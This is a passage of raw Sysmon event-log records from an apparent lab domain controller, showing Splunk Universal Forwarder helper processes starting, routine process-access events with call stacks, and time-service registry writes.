Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000179902Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:38.922{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D3E6-601A-2F30-00000000A301}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000179901Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:38.923{29E67E80-D3E6-601A-2F30-00000000A301}5024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000179900Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:38.391{29E67E80-D3E6-601A-2E30-00000000A301}1844888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179899Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:38.250{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D3E6-601A-2E30-00000000A301}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179898Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:38.250{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179897Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:38.250{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179896Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:38.250{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179895Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:38.250{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179894Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:38.250{29E67E80-7CBD-6019-0500-00000000A301}640756C:\Windows\system32\csrss.exe{29E67E80-D3E6-601A-2E30-00000000A301}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000179893Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:38.250{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D3E6-601A-2E30-00000000A301}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000179892Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:38.251{29E67E80-D3E6-601A-2E30-00000000A301}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x8000000000000000179909Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-SetValue2021-02-03 16:48:46.718{29E67E80-7CBF-6019-1000-00000000A301}1152C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6fa4c-0x7094beae) 10341000x8000000000000000179917Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:34.904{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D41E-601A-3030-00000000A301}6184C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179916Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:34.904{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179915Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:34.904{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179914Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:34.904{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179913Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:34.904{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179912Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:34.904{29E67E80-7CBD-6019-0500-00000000A301}640656C:\Windows\system32\csrss.exe{29E67E80-D41E-601A-3030-00000000A301}6184C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000179911Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:34.904{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D41E-601A-3030-00000000A301}6184C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000179910Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:34.905{29E67E80-D41E-601A-3030-00000000A301}6184C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000179935Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:35.576{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D41F-601A-3130-00000000A301}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179934Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:35.576{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179933Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:35.576{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179932Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:35.576{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179931Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:35.576{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179930Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:35.576{29E67E80-7CBD-6019-0500-00000000A301}640756C:\Windows\system32\csrss.exe{29E67E80-D41F-601A-3130-00000000A301}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000179929Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:35.576{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D41F-601A-3130-00000000A301}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000179928Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:49:35.576{29E67E80-D41F-601A-3130-00000000A301}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x8000000000000000179927Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-SetValue2021-02-03 16:49:35.341{29E67E80-7CBD-6019-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000179926Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-SetValue2021-02-03 